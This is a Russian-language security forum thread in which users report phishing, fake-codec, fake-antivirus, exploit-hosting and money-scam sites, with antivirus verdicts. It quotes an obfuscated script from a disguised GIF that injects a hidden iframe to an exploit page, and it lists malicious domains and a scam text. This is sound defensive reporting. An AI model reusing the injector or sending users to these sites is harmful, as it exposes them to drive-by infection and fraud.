PUA.Script.Packed-2 похоже что глюк, совпадение с сигнатурой какого нибудь трояна, подождите пока кто нибудь ещё ответит :)
Printable View
PUA.Script.Packed-2 похоже что глюк, совпадение с сигнатурой какого нибудь трояна, подождите пока кто нибудь ещё ответит :)
[QUOTE=sabello;379390] хттп://www.vf-guse.ru/templates/it_tribune/js/mootools.php//mootools Opera Internet Browser Запрещено: HEUR:Trojan-Downloader.Script.Generic[/QUOTE]
Там есть [QUOTE]eval(function(p,a,c,k,e,r){e=function(c)[/QUOTE]
так что Generic-реакция понятна..
Кто что знает об [url]http://vkontakte-rating.com[/url] сайте? Особенно интересуют программы, которые на нем. Есть ли там вирусы? Так как в них надо вводить логин и пароль...
Хотел посмотреть программу для поднятия рейтинга, но чтобы узнать пароль на архив нужно отдать копеичку :)
VkontakteRatingMaste? Я скачал, но пароля на архиве нет. Правда качал не с этого сайта
Да... обычно это GUI-троян...
[quote=senyak;380960]Кто что знает об _http://vkontakte-rating.com сайте? Особенно интересуют программы, которые на нем. Есть ли там вирусы? Так как в них надо вводить логин и пароль...[/quote]
У меня показывает авира что вирусы HTML/Infected.WebPage.Gen
---
Внимание! Лохотрон
Вот один чел искал через гуглю сайтец одноклассников и нод мне сообщил
[COLOR=#000000][FONT=Courier New]IMON - Интернет-монитор Инициирована программная вирусная тревога на COMP13: [/FONT][/COLOR][COLOR=#0000ff][FONT=Courier New][U]hттp://odnoklassniki.co.ua/[/U][/FONT][/COLOR][COLOR=#000000][FONT=Courier New] инфицирован HTML/TrojanClicker.IFrame.NAG троян.[/FONT][/COLOR]
[quote=Torvic99;381077]Вот один чел искал через гуглю сайтец одноклассников и нод мне сообщил
[COLOR=#000000][FONT=Courier New]IMON - Интернет-монитор Инициирована программная вирусная тревога на COMP13: [/FONT][/COLOR][COLOR=#0000ff][FONT=Courier New][U]hттp://odnoklassniki.co.ua/[/U][/FONT][/COLOR][COLOR=#000000][FONT=Courier New] инфицирован HTML/TrojanClicker.IFrame.NAG троян.[/FONT][/COLOR][/quote]
Странные корни у них - Japan
[quote=Гриша;380996]Хотел посмотреть программу для поднятия рейтинга, но чтобы узнать пароль на архив нужно отдать копеичку :)[/quote]
[url]http://files.mail.ru/JMXL8H[/url] - без пароля на архив
Они себе зарабатывают на платных файлообменниках и на этих глупых смс, проги эти все пустышки, ещё там нашел для взлома вконтакте, якобы брут, указал перебор из текстового файла только свой пароль, байда полная...
[size="1"][color="#666686"][B][I]Добавлено через 1 час 6 минут[/I][/B][/color][/size]
Вот ещё, поржать можно grandpro-line.com
[url]http://www.flickr.com/photos/36683195@N07/3405022957/sizes/o/[/url]
Контакты для связи крутые :)
[QUOTE]Директор компании: adminXgrandpro-line.com
Поддержка: supportXgrandpro-line.com[/QUOTE]
Ещё пару дней назад там был фальшивый обменный пункт
[url]http://www.flickr.com/photos/36683195@N07/3405029693/sizes/o/[/url]
На него зазывали объявлениями о заработке на разнице курсов валют в разных обменниках, при обмене на нём, деньги пропадали навсегда, их много таких
Похоже паук "съел" другого паука
1 что сейчас
2 что там было
[url=http://radikal.ru/F/s53.radikal.ru/i142/0904/88/40cee3dd7745.jpg.html][img]http://s53.radikal.ru/i142/0904/88/40cee3dd7745t.jpg[/img][/url] [url=http://radikal.ru/F/i072.radikal.ru/0904/7b/cf0c6f2912c3.jpg.html][img]http://i072.radikal.ru/0904/7b/cf0c6f2912c3t.jpg[/img][/url]
хттп://hot-girl-sex-tube.com/ - там явно вирус, в виде кодека
[url]http://www.virustotal.com/ru/analisis/da1067ed125dcadafe8bf2f66fb351bc[/url]
[QUOTE=senyak;387919]хттп://....../ - там явно вирус, в виде кодека
[URL]http://www.virustotal.com/ru/analisis/da1067ed125dcadafe8bf2f66fb351bc[/URL][/QUOTE]
Опасно!
Exploit: Trojan Fake Codec
This appears to be a fake codec. An increasingly common ploy is to offer to play a free video, and then to tell you that your computer cannot display the video, and needs a new codec, and 'Click here for the new codec'. The victim is prompted to install the codec, and sometimes gets to see the video, and sometimes doesn't, and usually is able to uninstall the 'codec'. What the victim doesn't realize is that it usually leaves behind a rootkit.
---
Интересно, это значит у импортных давно всё есть, а у нас если такое встречаешь то никаких предупреждений в помине нет
[size="1"][color="#666686"][B][I]Добавлено через 28 минут[/I][/B][/color][/size]
Запустил этот файлик, далее пошла загрузка с IP 195.88.80.207 (Латвия) ещё одного - XPAntivirus, далее этот антивирус будет говорить что у вас не всё трали-вали с системой и так до бесконечности пока не сопрут с компика всё что им нужно...
А какой у Вас антивирус? Кстати, эту ссыдку взял с русского форума Авиры. Там боты каждую минуту регятся
[QUOTE=senyak;387940]А какой у Вас антивирус? Кстати, эту ссыдку взял с русского форума Авиры. Там боты каждую минуту регятся[/QUOTE]
Старый симантек корп 10.1.7.7000 и ещё avg exploit link scanner, мне его здесь на форуме подсказали
[size="1"][color="#666686"][B][I]Добавлено через 11 минут[/I][/B][/color][/size]
Вот что это было (XPAntivirus) [url]http://www.prevx.com/filenames/X28478341409420989-X1/MSAS2009.EXE.html[/url]
[size="1"][color="#666686"][B][I]Добавлено через 25 минут[/I][/B][/color][/size]
Вот логи этой хадости MSAS2009.EXE [url]http://www.virustotal.com/analisis/f5e1b89eadcd27c32d03fc26c77076e8[/url]
вот картинка -
[url=http://radikal.ru/F/i017.radikal.ru/0904/25/692993864e6d.jpg.html][img]http://i017.radikal.ru/0904/25/692993864e6dt.jpg[/img][/url]
что то у мя такое подозрение что сандбокс мой компик спас только наполовину
У знакомой увели аську и периодически, с ее номера получал ссылочки на закачку СкринСейвера с пинчем. Но тут стали приходить ссылочки на картинку с
[url]http://yehoshua-m.com/images/[/url]
auto.gif
Если взглянуть во внутрь, оказывается, что gif это просто текстовый файл (Первый символ в файле auto.gif шестнадцатеричное 0A)
[QUOTE]
<img src="WorleyVision5.jpg"> <script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0066\u006f\u0072\u006b\u0061\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>[/QUOTE]
WorleyVision5.jpg - обычная картинка лежащая в каталоге. Вопрос, что творит этот джаваскрипт? (NoScript не дает его выполнить)
P.S. Интересно, что между jpg картинкой и текстом скрипта, туева хуча пробелов (т.е. просто жамкнув на просмотр, кода не видно)
[QUOTE=wowka;388472] Вопрос, что творит этот джаваскрипт? (NoScript не дает его выполнить)[/QUOTE]
Он дописывает и-фрейм на сайт, который
[QUOTE=FireFox]Имеется информация, что этот сайт атакует компьютеры![/QUOTE]
[QUOTE=Kuzz;388482]Он дописывает и-фрейм на сайт, который[/QUOTE]
А у меня как партизан молчит
[QUOTE=wowka;388486]А у меня как партизан молчит[/QUOTE]
Так NoScript не дал дописать и-фрейм - браузер и не пошел туда.
Потому и молчит
Эксплоит: MDAC (вроде)
xxx.com/images/auto.gif
С xxx.org/stats/ru1.php
---
Чёт куда то сгинул последний линк, уже пусто там :(
---
Теперь там другой эксплоит: pdf
Ведь можно же отслеживать, откуда пришел посетитель/
Скажем если с virusinfo.info - то скрипт, чистит свои следы :)? (хотя больно заумно так)
Нет, это так не делают, обычно по IP адресам такое распространено, у особо хитрых или по регионам если не ошибаюсь, не думаю что там такие есть, лень проверять...
очередной фишинг вконтакте vkortakt . ru
будьте внимательны!!
Все тот же action="log.php"
Как и [URL="http://virusinfo.info/showpost.php?p=380960&postcount=43"]тут[/URL]
Еще один - хттп://yougold.xaker.ru/ а с него перебрасывает на хттп://pashadurov.ru/
Но этот хоть сделай более с умом
[COLOR="Red"]XXX[/COLOR]-exploit.ru
(глядеть не стоит)
На сайте эксплойты для foxit reader, чёт впервой такое вижу
пробивают IE конечно конкретно, если всё стоит по умолчанию
[url]http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2009-032414-2531-99[/url]
Касперский не пикнул. Foxit reader стоит, но вроде ничего не случилось
Касперский не определяет, ссылки глубоко зарыты, так что не дам пока :)
[url]http://www.virustotal.com/analisis/be1fa0d45981bd170a70b366df9a903b[/url]
[size="1"][color="#666686"][B][I]Добавлено через 1 час 31 минуту[/I][/B][/color][/size]
Ну лана пойдёт...
[QUOTE]В присланном Вами файле обнаружено новое вредоносное программное обеспечение.
Его детектирование будет включено в очередное обновление антивирусных баз.
Благодарим за оказанную помощь.
Exploit.Win32.Pidief.asa[/QUOTE]
[size="1"][color="#666686"][B][I]Добавлено через 27 минут[/I][/B][/color][/size]
Как понял, эксплоит сделан для версии Foxit reader до версии 1506, win xp sp3, а для висты так и не понятно пока как там, они немного другие...
хттп://lesionka11.narod.ru/vkontakte.htm - опять Вконтакте
На первой картинке продажа неработающего антивируса с вирусами ( pestguardian.com/index.asp?domain= ), на второй картинке тесты продолжительности жизни, якобы, потом будет просить отправить смс ( lifoff.ru, health-testing-service.ru других 50 адресов не припомню )
Найдите 10 отличий
[url=http://radikal.ru/F/s43.radikal.ru/i100/0904/d1/b01dbeddd8c5.jpg.html][img]http://s43.radikal.ru/i100/0904/d1/b01dbeddd8c5t.jpg[/img][/url] [url=http://radikal.ru/F/s52.radikal.ru/i138/0904/26/67e587dc2786.jpg.html][img]http://s52.radikal.ru/i138/0904/26/67e587dc2786t.jpg[/img][/url]
_http://www.qeqeqe.ru/software/ruversionV-23.html
Бред какой-то :)
Вроде бы ставит FieryAds, программу которая была на сайтах с книгами, это Adware.
[QUOTE=bolshoy kot;392513]_http://www.qeqeqe.ru/software/ruversionV-23.html
Бред какой-то :)
Вроде бы ставит FieryAds, программу которая была на сайтах с книгами, это Adware.[/QUOTE]
auauau.ru
то же самое
[url]http://www.virustotal.com/analisis/f7cfdd2b7f91407e33228b85c2f5ba85[/url]
Там внутри трояны,
[url]http://www.virustotal.com/analisis/122c56b37c6f1a803cce457856b871ff[/url] тоже не определяются, но это примерно
Trojan-Spy.HTML.Smitfraud.c [Kaspersky], Phish-BankFraud.eml.a [McAfee], Trj/Citifraud.A [Panda Software], generic5 [AVG]
money-mark.com
Мдя, это что то...
Обещает что все будут зарабатывать по 450 000 р. в месяц сидя у компьютера дома.
Это какой то новый лохотрон, примерно как волшебные и золотые кошельки при переводе якобы сумма возвращается чуть больше.
Писанины там конечно очень много...
[QUOTE]Совсем недавно в платежной системе RBK Money (она же бывшая RuPay) появилась и пока еще действует новая серьезная брешь, основанная на бажженом SQL-запросе к БД RBK! И опять дырка связана с тем, что нашлись люди, которые узнали номер RU-кошелька, являющегося системным RU-кошельком RBK и выполняющего роль связующего во всех мелких денежных операциях между участниками системы с расширенным уровнем доступа и начальной датой регистрации более 7-и дней! Кто "не в танке" знает, что в ноябре 2007 года этот номер закрыли (после того как RuPay прознала о баге) и заместо него появился новый.[/QUOTE]
[QUOTE]Но сотрудники RBKMoney ошиблись в одном - они закрыли одну дыру: перепрограммировали транзитный счет, с которого люди черпали деньги. Но не до конца прикрыли SQL-уязвимость, которая помогла в прошлый раз прознать про секретный RU-номер! И вот наконец-то настал этот долгожданный момент (которого я лично ждал с большим нетерпением) - его тоже вычислили! Снова появилась возможность легкого заработка. И, по моим прогнозам, она продлится, как минимум, около года (пока и этот кошелек не закроют). [/QUOTE]
Интересно чья там фотка напечатана, а то по репке этому человеку точно могут настучать встретив на улице
[size="1"][color="#666686"][B][I]Добавлено через 4 часа 6 минут[/I][/B][/color][/size]
ikonapis.com
Иконы
[url=http://radikal.ru/F/s57.radikal.ru/i157/0904/b9/b54e705492a2.jpg.html][img]http://s57.radikal.ru/i157/0904/b9/b54e705492a2t.jpg[/img][/url]
[QUOTE]Работа проститутки Новосибирска, конечно же, никогда не поощрялось в обществе. Ведь общество против свободных сексуальных отношений, тем более за деньги. Более того, на секс ради удовольствия тоже пытались наложить запрет. Проститутки днём неприметны. Часто девушки посветивши себя проституции стремятся выглядеть как можно незаметнее: не одевают мини-юбок и даже не пользуются косметикой.
Встретив вполне обычную и не очень приветливую девушку на улице, Вы не сможете обнаружить в ней проститутку. Работницам интим досуга хватает общения на работе, в своей личной жизни они очень тихие и не вызывающие. Элитные проститутки больше похожи на преуспевающих деловых леди. Их интим услуги пользуются в Новосибирске большим спросом.
У 25% девушек проституток Новосибирска есть ребенок, порой и не один. Высшего образования, востребованного работодателями, у проститутки Новосибирска. Девушки вынуждены проститутки искать заработок на панели, совершенствуя профессию проститутки. Очень часто девочки объединяются в группы и снимают квартиру на несколько человек. Так проще выживать, воспитывать детей, ведь на счастливое замужество и семейный уют проститутки не рассчитывают.
Не все проститутки Новосибирска так удачливы, выполняя работу проститутки, некоторым удается сполна удовлетворить желания клиента, что спустя некоторое время клиенты признаются в любви... и даже предложил жениться. Мечты девушек сбываются... она становятся женами богатых, состоятельных. [/QUOTE]
Не пойму зачем это?
---
Разобрался в начеле линк "проститутки Новосибирска" на бордель, совсем уже совести нет...
[url]http://wm-casher.com/[/url] - подделка или честный сайт?
Баранка жёлтая,а категория - спам [url]http://www.mywot.com/ru/scorecard/wm-casher.com[/url]
[url]http://www.google.com/search?hl=ru&q=wm-casher.com&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=&aq=f&oq=[/url]
[QUOTE=Vagon;394906]Баранка жёлтая,а категория - спам [/QUOTE]
Убрал это, удалось связаться с ними. Всё что они мне ответили это было слово - да. Это плЁхо так делать. На спам есть только подозрение именно на этот ресурс ботами на форумах, а так у них ещё сайты есть
wmcasher.ru wm-casher.ru . Понаделают тут, понимаете, кучу сайтов на одном IP...
--
icq-confirm.info угон асек
wmr2.z-mega.ru
[url=http://radikal.ru/F/i075.radikal.ru/0905/7d/0adf5d11d793.jpg.html][img]http://i075.radikal.ru/0905/7d/0adf5d11d793t.jpg[/img][/url]
[QUOTE]а так у них ещё сайты есть
wmcasher.ru wm-casher.ru . Понаделают тут, понимаете, кучу сайтов на одном IP...[/QUOTE]
ага. как минимум еще вот эти висят на 91.197.162.210:
avtocasher.com
buyskype.ru
cashexpress.ru
mastercasher.com
obmenhelp.ru
sms-obmennik.ru
sms.wm63.su
smsobmennik.ru
vipcasher.com
wegods.ru
wewm.ru
wm-casher.com
wmcasher.ru
webofis.us
wm63.su
Считаю, что большая часть этих сайтов (если не все) - кидалы. Наугад зашел на один из них (sms-obmennik.ru). Сбоку надпись на их сайте, про то, что у них вебмани аттестат регистратора, идем по ссылке и затем смотрим наличие жалоб на этот вмид:
Вначале сюда по ссылке с сайта (искать на мониторе слева):
[url]http://passport.webmoney.ru/asp/certview4.asp?wmid=180132313078[/url]
Затем отсюда смотрим на 20 жалоб в арбитраже:
[url]http://arbitrage.webmoney.ru/asp/claims.asp?wmid=180132313078[/url]
Причем этот чел владелец 100% и сайта wmcasher.ru - т.к видим это имя в инфе по ссылке выше.
Номера для обмена интересные есть - 4460 [url]http://virusinfo.info/showthread.php?t=36663[/url] 3649 [url]http://virusinfo.info/showthread.php?t=30664[/url] ещё до этого догадки по поводу самой вебмани у мя были очень неприличные, пока...
[QUOTE]Дата регистрации в системе: 9 Сентября 2008 года[/QUOTE]
Вспомните кто нить когда стал аврал со всякими порно-информерами и заблоченными компиками, может это конечно совпадение или просто одни и теже короткие номерапринадлежат нескольким лицам?